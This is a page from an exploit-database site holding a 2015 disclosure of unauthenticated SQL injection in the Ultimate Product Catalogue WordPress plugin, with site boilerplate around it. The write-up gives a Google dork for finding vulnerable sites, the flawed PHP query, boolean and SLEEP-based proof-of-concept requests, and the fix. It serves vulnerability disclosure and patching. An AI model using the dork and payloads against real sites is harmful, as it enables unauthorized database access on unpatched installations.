0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Ultimate Product Catalogue WordPress Plugin - SQL Injecton Vulnerabilities

Author

Felipe Molina

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue
wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turnedd off, Apache
2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps
 
1. Summary:
 
     Ultimate Product Catalogue is A responsive and easily customizable
plugin for all your product catalogue needs. It has +59.000 downloads,
+3.000 active installations.
 
 Unauthenticated SQL injection in parameter "SingleProduct" when a web
visitor explores a product published by the web administrator
 
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3

3. Vulnerable code:
 
    File Functions/Shortcodes.php line 779
 
    Proof of concept
 
    http://<wordpress site>/?SingleProduct=2'+and+'a'='a
    http://<wordpress site>/?SingleProduct=2'+and+'a'='b
 
    In file Functions/Process_Ajax.php line 67:
 [...]
$Item_ID = $_POST['Item_ID'];
        $Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name
WHERE Item_ID=" . $Item_ID);
[...]
 
    Proof of concept:
 
    POST /wp-admin/admin-ajax.php HTTP/1.1
  Host: <wordpress host>
  [...]
  Cookie: wordpress_f305[...]
 
  Item_ID=2 AND SLEEP(5)&action=record_view
 
4. Solution:
 
    Update to version 3.1.3

#  0day.today [2024-10-05]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Ultimate Product Catalogue WordPress Plugin - SQL Injecton Vulnerabilities

Report Error

Report Error